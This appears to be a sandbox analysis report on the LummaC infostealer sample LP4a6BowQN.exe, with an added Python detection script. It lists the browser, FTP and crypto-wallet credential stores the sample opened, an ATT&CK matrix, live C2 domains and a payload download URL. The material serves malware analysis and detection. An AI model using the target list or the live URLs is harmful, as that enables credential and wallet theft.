Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.json
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffffla
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Directory queried: C:\Users\user\Documents\IZMFBFKMEB
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Directory queried: C:\Users\user\Documents\LFOPODGVOH
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Directory queried: C:\Users\user\Documents\LIJDSFKJZG
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Directory queried: C:\Users\user\Documents\PWZOQIFCAN
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Directory queried: C:\Users\user\Documents\QFAPOWPAFG
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Directory queried: C:\Users\user\Documents\SNIPGPPREP
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Directory queried: number of queries: 1001 (the directories above were each queried repeatedly)
Source: Yara match | File source: 00000000.00000003.1519966217.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1479177875.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: LP4a6BowQN.exe PID: 7624, type: MEMORYSTR
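The file-open and DNS behaviour listed above is what a host-based detection has to work with: one process sweeping many unrelated credential stores (Chrome extension state, FTP client profiles, desktop wallets) and then resolving the C2 domain. The following detection logic is an added example and is not part of the Joe Sandbox report. It encodes the report's opened directories and its malicious-domain list as detection content, then scores Sysmon-style events per process; it generalises beyond the single reported process to any process in the event stream. The event records, field names (`pid`, `image`, `type`, `value`), the `min_targets` threshold and the severity scheme are assumptions made for the example; the PID 7624 and the paths are taken from the report.

```python
"""Credential-store sweep detection built from this report's behaviour (added example)."""
import re
from collections import defaultdict

# Directories the sample opened, from the report's "File opened" rows, grouped
# by category. Matched as case-insensitive substrings so files beneath them count.
TARGET_DIRS = {
    "wallet": (
        r"\AppData\Roaming\Exodus\exodus.wallet", r"\AppData\Roaming\Ledger Live",
        r"\AppData\Roaming\atomic\Local Storage\leveldb", r"\AppData\Local\Coinomi\Coinomi\wallets",
        r"\AppData\Roaming\Bitcoin\wallets", r"\AppData\Roaming\Binance",
        r"\AppData\Roaming\com.liberty.jaxx\IndexedDB", r"\AppData\Roaming\Electrum\wallets",
        r"\AppData\Roaming\Electrum-LTC\wallets", r"\AppData\Roaming\Guarda\IndexedDB",
    ),
    "ftp_client": (
        r"\AppData\Roaming\FTPbox", r"\AppData\Roaming\SmartFTP\Client 2.0\Favorites",
        r"\AppData\Roaming\FTPRush", r"\AppData\Roaming\FTPGetter",
        r"\AppData\Roaming\FTPInfo", r"\ProgramData\SiteDesigner\3D-FTP",
    ),
}
# Chrome stores per-extension state under "Local Extension Settings\<32-char id>";
# the report shows three such directories being opened.
EXT_SETTINGS_RE = re.compile(r"\\Local Extension Settings\\([a-p]{32})(?:\\|$)", re.IGNORECASE)

# Domains the report marks malicious (C2 is https://cuddlyready.xyz/api).
C2_DOMAINS = {
    "cuddlyready.xyz", "sendypaster.xyz", "steppriflej.xyz", "smash-boiling.cyou",
    "supporse-comment.cyou", "hosue-billowy.cyou", "ripe-blade.cyou",
    "greywe-snotty.cyou", "pollution-raker.cyou",
}


def classify_path(path):
    """Return (category, target_key) when `path` is a stealer target, else None."""
    win = path.replace("/", "\\")
    norm = win.lower()
    for category, dirs in TARGET_DIRS.items():
        for d in dirs:
            if d.lower() in norm:
                return category, d.lower()
    m = EXT_SETTINGS_RE.search(win)
    if m:
        return "browser_extension", "ext:" + m.group(1).lower()
    return None


def is_c2_domain(name):
    """True if `name` is a listed C2 domain or a subdomain of one."""
    n = name.rstrip(".").lower()
    return any(n == d or n.endswith("." + d) for d in C2_DOMAINS)


def detect_sweeps(events, min_targets=3):
    """Group events by pid; flag processes that open >= min_targets distinct target
    directories, or open any target and resolve a C2 domain. Both -> "high"."""
    per_pid = defaultdict(lambda: {"image": None, "targets": set(), "categories": set(), "c2": set()})
    for ev in events:
        rec = per_pid[ev["pid"]]
        rec["image"] = ev["image"]
        if ev["type"] == "file_open":
            hit = classify_path(ev["value"])
            if hit:
                rec["categories"].add(hit[0])
                rec["targets"].add(hit[1])
        elif ev["type"] == "dns" and is_c2_domain(ev["value"]):
            rec["c2"].add(ev["value"].rstrip(".").lower())
    findings = {}
    for pid, rec in per_pid.items():
        sweep = len(rec["targets"]) >= min_targets
        beacon = bool(rec["targets"]) and bool(rec["c2"])
        if sweep or beacon:
            findings[pid] = {
                "image": rec["image"], "targets": sorted(rec["targets"]),
                "categories": sorted(rec["categories"]), "c2": sorted(rec["c2"]),
                "severity": "high" if (sweep and rec["c2"]) else "medium",
            }
    return findings


def _ev(pid, image, kind, value):
    return {"pid": pid, "image": image, "type": kind, "value": value}


# Constructed sample events (not the report's raw log). PID 7624 mirrors the
# reported process; chrome.exe and explorer.exe are benign noise.
SAMPLE = r"C:\Users\user\Desktop\LP4a6BowQN.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
EXT_DIR = r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn"
SAMPLE_EVENTS = [
    _ev(7624, SAMPLE, "file_open", EXT_DIR),
    _ev(7624, SAMPLE, "file_open", r"C:\Users\user\AppData\Roaming\Exodus\exodus.wallet"),
    _ev(7624, SAMPLE, "file_open", r"C:\Users\user\AppData\Roaming\Ledger Live"),
    _ev(7624, SAMPLE, "file_open", r"C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites"),
    _ev(7624, SAMPLE, "file_open", r"C:\Users\user\AppData\Roaming\Electrum\wallets\default_wallet"),
    _ev(7624, SAMPLE, "dns", "cuddlyready.xyz"),
    _ev(4242, CHROME, "file_open", EXT_DIR + r"\000003.log"),   # browser touching its own data
    _ev(5150, r"C:\Windows\explorer.exe", "file_open", r"C:\Users\user\Documents\report.docx"),
    _ev(5150, r"C:\Windows\explorer.exe", "dns", "bitbucket.org"),
]

if __name__ == "__main__":
    for pid, f in detect_sweeps(SAMPLE_EVENTS).items():
        print(pid, f["severity"], f["image"], f["categories"], f["c2"])
```

The threshold matters: a browser legitimately opens its own extension directory and a wallet application its own wallet, so a single target hit is noise; it is the breadth across categories, or one target combined with resolution of the C2 domain, that distinguishes the stealer.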

Remote Access Functionality

Source: Yara match | File source: Process Memory Space: LP4a6BowQN.exe PID: 7624, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Mitre Att&ck Matrix

The number in parentheses after a technique is the hit count the report attaches to it (matching behaviour signatures); techniques without a number are the matrix's unmatched cells.

Tactic | Techniques
Reconnaissance | Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development | Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access | Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution | Windows Management Instrumentation (2); PowerShell (1); At; Cron; Launchd; Scheduled Task
Persistence | DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation | Process Injection (2); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion | Virtualization/Sandbox Evasion (34); Process Injection (2); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Software Packing (12); DLL Side-Loading (1)
Credential Access | OS Credential Dumping (2); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery | Query Registry (1); Security Software Discovery (751); Virtualization/Sandbox Evasion (34); Process Discovery (2); File and Directory Discovery (2); System Information Discovery (223)
Lateral Movement | Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection | Data from Local System (41); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control | Encrypted Channel (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (3); Application Layer Protocol (114); Fallback Channels; Multiband Communication
Exfiltration | Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact | Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
LP4a6BowQN.exe | 58% | ReversingLabs | Win32.Infostealer.Tinba
LP4a6BowQN.exe | 58% | Virustotal | (see VirusTotal entry)
LP4a6BowQN.exe | 100% | Avira | TR/Crypt.TPM.Gen
LP4a6BowQN.exe | 100% | Joe Sandbox ML | (no label)

Scanner labels are each vendor's own family naming and need not agree with the sandbox's configuration-based LummaC identification.

Dropped Files: No Antivirus matches
Unpacked PE Files: No Antivirus matches
Domains: No Antivirus matches
URLs: No Antivirus matches
Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
s3-w.us-east-1.amazonaws.com | 16.182.101.249 | true | false | (none) | high
bitbucket.org | 185.166.143.49 | true | false | (none) | high
cuddlyready.xyz | 104.21.32.96 | true | true | (none) | unknown
bbuseruploads.s3.amazonaws.com | unknown | unknown | false | (none) | high
Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
sendypaster.xyz | true | (none) | unknown
steppriflej.xyz | true | (none) | unknown
smash-boiling.cyou | true | (none) | unknown
https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe | false | (none) | high
supporse-comment.cyou | true | (none) | unknown
hosue-billowy.cyou | true | (none) | unknown
cuddlyready.xyz | true | (none) | unknown
ripe-blade.cyou | true | (none) | unknown
greywe-snotty.cyou | true | (none) | unknown
https://cuddlyready.xyz/api | true | (none) | unknown
pollution-raker.cyou | true | (none) | unknown
URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0 | LP4a6BowQN.exe, 00000000.00000003.1474687846.0000000005496000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1475117260.000000000549C000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://duckduckgo.com/chrome_newtab | LP4a6BowQN.exe, 00000000.00000003.1400298929.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400223917.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400160474.00000000054DF000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1- | LP4a6BowQN.exe, 00000000.00000003.1662738750.00000000054AD000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://duckduckgo.com/ac/?q= | LP4a6BowQN.exe, 00000000.00000003.1400298929.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400223917.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400160474.00000000054DF000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://cuddlyready.xyz/pi | LP4a6BowQN.exe, 00000000.00000003.1399414782.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp | false | (none) | unknown
https://cuddlyready.xyz/apim | LP4a6BowQN.exe, 00000000.00000003.1449986604.00000000054A1000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1450463340.000000000549D000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1450513722.00000000054A0000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1449717243.000000000549D000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1452753970.00000000054A0000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1449804953.00000000054A0000.00000004.00000800.00020000.00000000.sdmp | false | (none) | unknown
https://cuddlyready.xyz/ | LP4a6BowQN.exe, 00000000.00000003.1475117260.000000000549C000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1449717243.000000000549D000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1505886935.000000000549D000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1399489133.0000000000B82000.00000004.00000020.00020000.00000000.sdmp | false | (none) | unknown
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ | LP4a6BowQN.exe, 00000000.00000003.1662738750.00000000054AD000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exeX | LP4a6BowQN.exe, 00000000.00000002.1990318345.0000000000B82000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662850371.0000000000B82000.00000004.00000020.00020000.00000000.sdmp | false | (none) | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | LP4a6BowQN.exe, 00000000.00000003.1400298929.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400223917.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400160474.00000000054DF000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ | LP4a6BowQN.exe, 00000000.00000003.1662738750.00000000054AD000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://cuddlyready.xyz/a | LP4a6BowQN.exe, 00000000.00000003.1425120047.000000000549E000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1424948648.0000000005499000.00000004.00000800.00020000.00000000.sdmp | false | (none) | unknown
https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net | LP4a6BowQN.exe, 00000000.00000003.1662738750.00000000054AD000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exed | LP4a6BowQN.exe, 00000000.00000002.1993802166.0000000005497000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://cuddlyready.xyz/d | LP4a6BowQN.exe, 00000000.00000003.1399414782.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp | false | (none) | unknown
https://remote-app-switcher.prod-east.frontend.public.atl-paas.net | LP4a6BowQN.exe, LP4a6BowQN.exe, 00000000.00000003.1662962189.0000000000BF5000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1993802166.0000000005497000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662713332.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1993802166.00000000054AD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662738750.00000000054AD000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
http://x1.c.lencr.org/0 | LP4a6BowQN.exe, 00000000.00000003.1450197489.00000000054BC000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
http://x1.i.lencr.org/0 | LP4a6BowQN.exe, 00000000.00000003.1450197489.00000000054BC000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe.0.0 | LP4a6BowQN.exe, 00000000.00000002.1984216252.00000000006FA000.00000004.00000010.00020000.00000000.sdmp | false | (none) | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | LP4a6BowQN.exe, 00000000.00000003.1400298929.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400223917.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400160474.00000000054DF000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://cuddlyready.xyz/t | LP4a6BowQN.exe, 00000000.00000003.1506045565.0000000000C13000.00000004.00000020.00020000.00000000.sdmp | false | (none) | unknown
https://aui-cdn.atlassian.com/ | LP4a6BowQN.exe, 00000000.00000003.1662738750.00000000054AD000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://bbuseruploads.s3.amazonaws.com:443/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3 | LP4a6BowQN.exe, 00000000.00000003.1662850371.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp | false | (none) | high
https://support.mozilla.org/products/firefoxgro.all | LP4a6BowQN.exe, 00000000.00000003.1452009343.00000000055B8000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl | LP4a6BowQN.exe | false | (none) | unknown
https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net | LP4a6BowQN.exe, 00000000.00000003.1662738750.00000000054AD000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
